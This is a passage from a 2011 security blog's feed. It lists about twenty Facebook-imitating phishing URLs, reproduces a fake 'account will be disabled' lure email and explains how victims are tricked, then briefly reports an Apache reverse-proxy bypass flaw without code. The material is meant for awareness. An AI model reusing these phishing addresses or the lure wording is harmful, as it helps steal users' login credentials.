&lt;b&gt;&lt;i&gt;http://www.profile.co.gp/facebook/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.sjscheat.com/Hosting%20blogger/facebook&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://h1.ripway.com/denal/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://1337r00t.13.ohost.de/r00tw00tkn00wn/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://faacebok.zapto.org/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://h4ck3rgadungan.adfoo.info/index1.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.2498.b.hostable.me/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;___________________________________&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;+ Updated (28.11.2011):&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.facebook.reekcreations.com/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://wvw.facebook.com-photos.php.id.1574348425.jgold.in/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://fan-pages.vgig.ir/facebook.com.home.php.sk-2361831622.applicationspage/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://timkoch71.net46.net/1638765386283/facebook/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://privacy-facebook-it.f11.us/check_privacy.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.configsetting.com/facebook/login.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://facebook-beta.kilu.de/facebooklogin.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://www.frfacebook.fr/&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://fun4iran.tk/facebook.unfiltered/Index.htm&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;http://login.eu.nu/facebook/photo.phpfbid=1248427590010&amp;amp;set=a.1292457490730.34590.1809072438&amp;amp;type=1&amp;amp;theater.html&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;h4&gt;&lt;b&gt;How Do People Fall For These Link?&lt;/b&gt;&lt;/h4&gt;&lt;i&gt;&lt;b&gt;LAST WARNING :&lt;/b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt; Your account is reported to have violated the policies that are considered annoying or insulting Facebook users. Until we system will disable your account within 24 hours if you do not do the reconfirmation.&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Please confirm your account below:&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;[Link Removed]&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Thanks.&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;The Facebook Team&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Copyright facebook © 2011 Inc. All rights reserved.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;At this point of time you might be wondering, how do users fall for these kind of scams, How are they redirected to these phishing pages. Now there are lots of ways how attackers do it, However Here is an example of a recent facebook account delete scam.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;br /&gt;
The victim is sent the above message from a random email address which appears to be something like &lt;b&gt;facebookprivacy@gmail.com&lt;/b&gt;, &lt;b&gt;account_delete_facebook@gmail.com, &lt;/b&gt;while looking at these email&amp;nbsp;address&amp;nbsp;the victims feels that the email is from a legitimate source.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-9041482978147031021?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=82-8Mmd-xpw:icwVc03hGYQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=82-8Mmd-xpw:icwVc03hGYQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=82-8Mmd-xpw:icwVc03hGYQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=82-8Mmd-xpw:icwVc03hGYQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=82-8Mmd-xpw:icwVc03hGYQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/82-8Mmd-xpw" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9041482978147031021/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/11/facebook-phishing-scams-at-its-best.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9041482978147031021?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9041482978147031021?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/82-8Mmd-xpw/facebook-phishing-scams-at-its-best.html" title="Facebook Phishing Scams At It's Best" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Qc8_-sr52Yk/TkV_RstmlVI/AAAAAAAABYM/sKPMELu4C3c/s72-c/facebookphishing.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/11/facebook-phishing-scams-at-its-best.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEYFSHszfip7ImA9WhRRGE4.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3405397507969476052</id><published>2011-11-27T07:19:00.000-08:00</published><updated>2011-12-02T06:28:39.586-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-02T06:28:39.586-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Security flaws" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>Unpatched Apache Flaw Allows The Attacker To Access Protected Directories</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-a9v_k3nXbsk/TtJUrWXT9DI/AAAAAAAABjk/EALAzpD78bc/s1600/apache-ddos-attacking-tool.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="262" src="http://1.bp.blogspot.com/-a9v_k3nXbsk/TtJUrWXT9DI/AAAAAAAABjk/EALAzpD78bc/s640/apache-ddos-attacking-tool.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Security researcher&amp;nbsp;Prutha Parikh discovers yet another reverse proxy vulnerability with Apache, The vulnerability was discovered as she was trying to write the signature for the older&amp;nbsp;CVE-2011-4317 vulnerability. According to the security researcher an attacker can manage to access the internal network if the vulnerability is&amp;nbsp;successful&amp;nbsp;exploited.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;How It Works?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
An attacker can make use of a crafted http request to bypass the security mechanism and exploit a fully patched version of Apache and can allow the attacker to access the internal network is reverse proxy rules are not properly configured.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Proof Of Concept:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The security researcher has demonstrated a POC at Qualys website &lt;a href="https://community.qualys.com/blogs/securitylabs/2011/11/23/apache-reverse-proxy-bypass-issue"&gt;here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3405397507969476052?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=8PbnAjUzu_4:hNdcrlaWeII:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=8PbnAjUzu_4:hNdcrlaWeII:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=8PbnAjUzu_4:hNdcrlaWeII:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=8PbnAjUzu_4:hNdcrlaWeII:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=8PbnAjUzu_4:hNdcrlaWeII:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/8PbnAjUzu_4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3405397507969476052/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2011/11/unpatched-apache-flaw-allows-attacker.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3405397507969476052?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3405397507969476052?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/8PbnAjUzu_4/unpatched-apache-flaw-allows-attacker.html" title="Unpatched Apache Flaw Allows The Attacker To Access Protected Directories" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-a9v_k3nXbsk/TtJUrWXT9DI/AAAAAAAABjk/EALAzpD78bc/s72-c/apache-ddos-attacking-tool.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2011/11/unpatched-apache-flaw-allows-attacker.html</feedburner:origLink></entry></feed>

